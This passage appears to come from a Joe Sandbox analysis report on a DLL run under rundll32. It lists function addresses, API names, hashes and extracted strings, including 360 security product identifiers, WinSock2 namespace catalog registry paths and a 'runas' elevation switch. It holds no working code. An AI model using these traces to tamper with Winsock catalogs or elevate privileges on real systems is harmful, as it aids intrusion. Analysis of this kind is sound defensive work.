                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CriticalLibraryLoadResourceSection$ErrorLastModule$CountEnterFileFindFreeHandleInitializeLeaveNameSizeofSpin_errnomemmovememset
                                                                                                  • String ID: APPID$Module$Module_Raw$REGISTRY
                                                                                                  • API String ID: 1685702935-2529269209
                                                                                                  • Opcode ID: 3ceff26221d8725232ae8591cbe8c72322095ba2c2c9e72f7b8b6d0864ba4b02
                                                                                                  • Instruction ID: 1170741c672b2f4bc32c1c4dc3a7fce7b8275b676f47fdb2797edeea2ade6d42
                                                                                                  • Opcode Fuzzy Hash: 3ceff26221d8725232ae8591cbe8c72322095ba2c2c9e72f7b8b6d0864ba4b02
                                                                                                  • Instruction Fuzzy Hash: 29D18132705B8886FBA2DBA5E8403DA73A0F7897D4F509125BA5D47BA5EF38C649C700
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 000000018004E5DC Relevance: 30.3, APIs: 15, Strings: 2, Instructions: 545registryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CriticalSection$EnterLeave$HeapInfoOpenProcessQuerywcsstr
                                                                                                  • String ID: %s\%s$%s\NameSpace_Catalog5\Catalog_Entries\%012d
                                                                                                  • API String ID: 3416916155-2281247154
                                                                                                  • Opcode ID: 851d72f758c609aaf0f7580462004af6cc936b62e1bcf46d8cf7636727f3a395
                                                                                                  • Instruction ID: ff7a32f2b868f52803f629acb27a054862175391eb200bc512a22fc71bba3e47
                                                                                                  • Opcode Fuzzy Hash: 851d72f758c609aaf0f7580462004af6cc936b62e1bcf46d8cf7636727f3a395
                                                                                                  • Instruction Fuzzy Hash: A332AE72700B8886EB92DF64E8803DD33A0F74A7D8F10852AEA5D477A5DF38C699C704
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0000000180060578 Relevance: 30.0, APIs: 12, Strings: 5, Instructions: 289registrywindowtimeCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Windowmemset$MessageQuerySendTimeoutValue$CloseFindForegroundOpenmemmove
                                                                                                  • String ID: MsgCenter$Q360SafeMonClass$TS2P$activeapp$activeweb
                                                                                                  • API String ID: 3772276521-2728888700
                                                                                                  • Opcode ID: 252ce8677bfb522a4b6632ad157aa9371a8792e99c65b85e20036a72b1270932
                                                                                                  • Instruction ID: ee8cae4e48a5beadbc07239537d79e19b069e47090ef93ff609d4821bf219365
                                                                                                  • Opcode Fuzzy Hash: 252ce8677bfb522a4b6632ad157aa9371a8792e99c65b85e20036a72b1270932
                                                                                                  • Instruction Fuzzy Hash: C1D19172604B4886EB51DF25E8403DE7761F789BE8F608215EAAD43BE5DF38C649CB40
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 000000018005958C Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 169registryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CloseOpenmemset$QueryValue_wcsicmp$Enummemmoveswprintf
                                                                                                  • String ID: Device Parameters$Driver$EDID
                                                                                                  • API String ID: 3978137082-2299925461
                                                                                                  • Opcode ID: b95cd2e3d8507b9a87a60e61deae70fe2a7455a91287d77eb7c845bd1ab5848f
                                                                                                  • Instruction ID: 9305dd9bcaed70cdf0d37fe600fca7c095d3f7e64be226b027989fd01a2a7e0b
                                                                                                  • Opcode Fuzzy Hash: b95cd2e3d8507b9a87a60e61deae70fe2a7455a91287d77eb7c845bd1ab5848f
                                                                                                  • Instruction Fuzzy Hash: E481A632615A8886EBA2CF65E8407DAB3A0FB897C4F048115FE8C57665EF39C74DCB00
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0000000180004638 Relevance: 29.4, APIs: 19, Instructions: 914COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CountCriticalErrorInitializeLastSectionSpin
                                                                                                  • String ID:
                                                                                                  • API String ID: 439134102-0
                                                                                                  • Opcode ID: a46c37f9d43addc7902de8a620b67c5d7e9bf97180802cf92c4b38db29028bd0
                                                                                                  • Instruction ID: 174b29e8cd160b97723a189948c8d9aaf29f8d7efdb631c6e245ba98a82576f0
                                                                                                  • Opcode Fuzzy Hash: a46c37f9d43addc7902de8a620b67c5d7e9bf97180802cf92c4b38db29028bd0
                                                                                                  • Instruction Fuzzy Hash: 21826D76604B4982FB96CB29E8403DA33A1F789BE4F15C125EE5D477A4EF38CA49C350
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 000000018007E7C7 Relevance: 28.7, APIs: 16, Strings: 3, Instructions: 248COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: free$calloc$memset
                                                                                                  • String ID: -$]$]
                                                                                                  • API String ID: 2591755499-1349866957
                                                                                                  • Opcode ID: 2679cd0fb79ab9e79cb7ec4cb87940f65e1566cfba3dc15da5d319deb0b258b9
                                                                                                  • Instruction ID: 1d85a50f400dc416e5d0a718f77556582d5ce19bdf984b68484f18af02043cc0
                                                                                                  • Opcode Fuzzy Hash: 2679cd0fb79ab9e79cb7ec4cb87940f65e1566cfba3dc15da5d319deb0b258b9
                                                                                                  • Instruction Fuzzy Hash: BCA1D272706BC892EB96CB16D0403A977A1F74D780F449616EB8A17B81DF39D2B9D300
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 000000018005D014 Relevance: 28.4, APIs: 8, Strings: 8, Instructions: 422timesynchronizationCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Timefree$??3@System$FileMutexRelease
                                                                                                  • String ID: AND $ SLEV = %d $ TYPE = %d$ WHERE $DELETE FROM 'MT' $INSERT INTO "MT" VALUES ( ?,?,?,?,?,?,?,?,?,?,?,?,NULL ) $ModName LIKE '$TimeStamp < %I64d;
                                                                                                  • API String ID: 2360919559-3261407791
                                                                                                  • Opcode ID: 0fdc13341be9cf7c256e26cb2936a3b5a8a79f5d9c0121a176094682301e8f56
                                                                                                  • Instruction ID: fbbc87ecfbf22c2b8803d4662eccf4799cfebf60f86054df91e993a66dbd8da4
                                                                                                  • Opcode Fuzzy Hash: 0fdc13341be9cf7c256e26cb2936a3b5a8a79f5d9c0121a176094682301e8f56
                                                                                                  • Instruction Fuzzy Hash: B102B332711A4C85FFB29BA5D4403DD2361AB887D8F148627BE2E6B7D4DE3AC649C300
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0000000180052FD8 Relevance: 23.1, APIs: 5, Strings: 8, Instructions: 303registryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CriticalSection$CloseDeleteEnterLeaveOpenmemset
                                                                                                  • String ID: %s\%s$Catalog_Entries$Catalog_Entries64$NameSpace_Catalog5$Num_Catalog_Entries$Num_Catalog_Entries64$SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\%s$SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\%s\%012d
                                                                                                  • API String ID: 2413450229-732542554
                                                                                                  • Opcode ID: 5d3b3c8892c10d7fff7567f6933cd8fc0a8177a7f871dcf3f8d0113f8f36deb6
                                                                                                  • Instruction ID: 3ab1713314ff84c9548747a70e29f101a91a5434d94fe8d6158548384223fcd6
                                                                                                  • Opcode Fuzzy Hash: 5d3b3c8892c10d7fff7567f6933cd8fc0a8177a7f871dcf3f8d0113f8f36deb6
                                                                                                  • Instruction Fuzzy Hash: 69C1DEB1701A4D82EEA6DB29E8457D963A0F788BD4F04C422FE0D1B7A5DF39C64AC700
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 000000018000834C Relevance: 19.8, APIs: 13, Instructions: 336stringregistryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                    • Part of subcall function 0000000180008C68: CharNextW.USER32 ref: 0000000180008CA7
                                                                                                    • Part of subcall function 0000000180008C68: CharNextW.USER32 ref: 0000000180008CD3
                                                                                                    • Part of subcall function 0000000180008C68: CharNextW.USER32 ref: 0000000180008D81
                                                                                                  • lstrcmpiW.KERNEL32(?,00000000,00000000,?,?,00000000,00000000,0000000180009076,?,?,00000000,?,?,00000000,00000000,00000000), ref: 00000001800083C8
                                                                                                  • lstrcmpiW.KERNEL32(?,?,00000000,00000000,0000000180009076,?,?,00000000,?,?,00000000,00000000,00000000,000000018000976A), ref: 00000001800083E6
                                                                                                  • CharNextW.USER32(?,?,00000000,00000000,0000000180009076,?,?,00000000,?,?,00000000,00000000,00000000,000000018000976A), ref: 0000000180008457
                                                                                                  • CharNextW.USER32(?,?,00000000,00000000,0000000180009076,?,?,00000000,?,?,00000000,00000000,00000000,000000018000976A), ref: 0000000180008541
                                                                                                  • CharNextW.USER32(?,?,00000000,00000000,0000000180009076,?,?,00000000,?,?,00000000,00000000,00000000,000000018000976A), ref: 000000018000855D
                                                                                                  • RegSetValueExW.ADVAPI32(?,?,00000000,00000000,0000000180009076,?,?,00000000,?,?,00000000,00000000,00000000,000000018000976A), ref: 00000001800085C2
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CharNext$lstrcmpi$Value
                                                                                                  • String ID:
                                                                                                  • API String ID: 3520330261-0
                                                                                                  • Opcode ID: e6b0475dc37a1ccc9b5f93fb3a52cf7f5178555000e54cf4b197682acd1df91f
                                                                                                  • Instruction ID: 54a0f5542f62afcd6411b2081a4c08be2fbbe8d603b0a409542dd15f8ed12d0a
                                                                                                  • Opcode Fuzzy Hash: e6b0475dc37a1ccc9b5f93fb3a52cf7f5178555000e54cf4b197682acd1df91f
                                                                                                  • Instruction Fuzzy Hash: D3D1643260864982FBA2DB15E8543DA76E1FB9C7D0F91C121BA99476E4EF38C74DD700
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0000000180060174 Relevance: 19.5, APIs: 8, Strings: 3, Instructions: 270COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _wtoi$Value$??3@memset
                                                                                                  • String ID: %d|%d|%d|%d$MontiorInfo$MsgCenter
                                                                                                  • API String ID: 1219333133-3184008533
                                                                                                  • Opcode ID: 5a13214d90345a148425d7b4cec5787b2bbb9191422684e28f36f8c5be619ee2
                                                                                                  • Instruction ID: 3a97e8b4d36ab7b0ff62b7c8c746816c118d75ce1dcaba847e92933311b9e76e
                                                                                                  • Opcode Fuzzy Hash: 5a13214d90345a148425d7b4cec5787b2bbb9191422684e28f36f8c5be619ee2
                                                                                                  • Instruction Fuzzy Hash: FDC1B472604B4887EB51CF29E84039E77A1F789BA4F208216FAAD577A4DF78D644CB00
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0000000180040CB0 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 78libraryloaderCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Version$AddressHandleModuleProcValueatoimemset
                                                                                                  • String ID: CurrentVersion$RtlGetVersion$SOFTWARE\Microsoft\Windows NT\CurrentVersion$ntdll.dll
                                                                                                  • API String ID: 1009632096-1820686997
                                                                                                  • Opcode ID: 96873d62ae8b00b27b2edc00cc4e017e8c26c7791766384428e26c81b31d8715
                                                                                                  • Instruction ID: 603b8f84a57364ab934b969a098bbde4f8155cf87e7eb2653b8acdc6aa15b94a
                                                                                                  • Opcode Fuzzy Hash: 96873d62ae8b00b27b2edc00cc4e017e8c26c7791766384428e26c81b31d8715
                                                                                                  • Instruction Fuzzy Hash: 0F416D31615A498AF792CF20EC883DB77A0F78C7A5F918115F56A426A8DF3CD24CCB00
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 000000018003A8D4 Relevance: 16.6, APIs: 11, Instructions: 87libraryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • LoadLibraryExW.KERNEL32(?,00000000,?,?,00000000,000000018003AAB8,?,?,?,?,00000000), ref: 000000018003A907
                                                                                                  • FindResourceW.KERNEL32(?,00000000,?,?,00000000,000000018003AAB8,?,?,?,?,00000000), ref: 000000018003A91F
                                                                                                  • SizeofResource.KERNEL32(?,00000000,?,?,00000000,000000018003AAB8,?,?,?,?,00000000), ref: 000000018003A933
                                                                                                  • LoadResource.KERNEL32(?,00000000,?,?,00000000,000000018003AAB8,?,?,?,?,00000000), ref: 000000018003A942
                                                                                                  • LockResource.KERNEL32(?,00000000,?,?,00000000,000000018003AAB8,?,?,?,?,00000000), ref: 000000018003A953
                                                                                                  • malloc.MSVCRT(?,00000000,?,?,00000000,000000018003AAB8,?,?,?,?,00000000), ref: 000000018003A964
                                                                                                  • memmove.MSVCRT(?,00000000,?,?,00000000,000000018003AAB8,?,?,?,?,00000000), ref: 000000018003A97B
                                                                                                  • FreeResource.KERNEL32(?,00000000,?,?,00000000,000000018003AAB8,?,?,?,?,00000000), ref: 000000018003A983
                                                                                                  • FreeLibrary.KERNEL32(?,00000000,?,?,00000000,000000018003AAB8,?,?,?,?,00000000), ref: 000000018003A98C
                                                                                                  • VerQueryValueW.VERSION(?,00000000,?,?,00000000,000000018003AAB8,?,?,?,?,00000000), ref: 000000018003A9B4
                                                                                                  • free.MSVCRT(?,00000000,?,?,00000000,000000018003AAB8,?,?,?,?,00000000), ref: 000000018003A9D9
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Resource$FreeLibraryLoad$FindLockQuerySizeofValuefreemallocmemmove
                                                                                                  • String ID:
                                                                                                  • API String ID: 3317409091-0
                                                                                                  • Opcode ID: d575d481ff84caad7d8740059adda23fe9f9648e66c4b8f54cfb60a62ec78070
                                                                                                  • Instruction ID: 8185c375a913dccbf35fde3c3455573a2fd048fb7f01b55c3a130ccbeb9ebe14
                                                                                                  • Opcode Fuzzy Hash: d575d481ff84caad7d8740059adda23fe9f9648e66c4b8f54cfb60a62ec78070
                                                                                                  • Instruction Fuzzy Hash: 09316B35606B4886EA86DF16AC0479AB3E4BB4DFC0F0A8426AE4907764EF3CD649C700
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00000001800647B0 Relevance: 16.1, APIs: 8, Strings: 1, Instructions: 395memoryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ??3@CriticalSectionString$??2@AllocAttributesEnterFileFreeLeavememmove
                                                                                                  • String ID: 360util
                                                                                                  • API String ID: 2488163691-2294763832
                                                                                                  • Opcode ID: ba9b85f3e8219bbad665a1013a4ecfff85fbfd5e77b065d066760422abbecf22
                                                                                                  • Instruction ID: 9938724ed40c23cc8900e9648d175c046ed33f6fe674e618e7d9782a5817fc1c
                                                                                                  • Opcode Fuzzy Hash: ba9b85f3e8219bbad665a1013a4ecfff85fbfd5e77b065d066760422abbecf22
                                                                                                  • Instruction Fuzzy Hash: AE029C73B01B488AEB91CB64D8443DD33A6FB48798F519226EE592BB94DF38C619C344
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0000000180066A50 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 121COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: memset$CloseCommandExecuteFileHandleLineModuleNameShell
                                                                                                  • String ID: /elevated$MPR.dll$runas
                                                                                                  • API String ID: 3400839104-479190379
                                                                                                  • Opcode ID: ff0e70aebe942903d03514da05f5171b976ef8719cbab5a1757af81890fa035d
                                                                                                  • Instruction ID: c5738ef19aefcfe0893ce15e6bbb4f81d570db0aa822fd902f1c1618a14612e4
                                                                                                  • Opcode Fuzzy Hash: ff0e70aebe942903d03514da05f5171b976ef8719cbab5a1757af81890fa035d
                                                                                                  • Instruction Fuzzy Hash: 35518F32611B4481EB919B29D85039A73A5FB88BF4F108316FABE437E4DF38C649C740
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0000000180070760 Relevance: 15.1, APIs: 10, Instructions: 88COMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
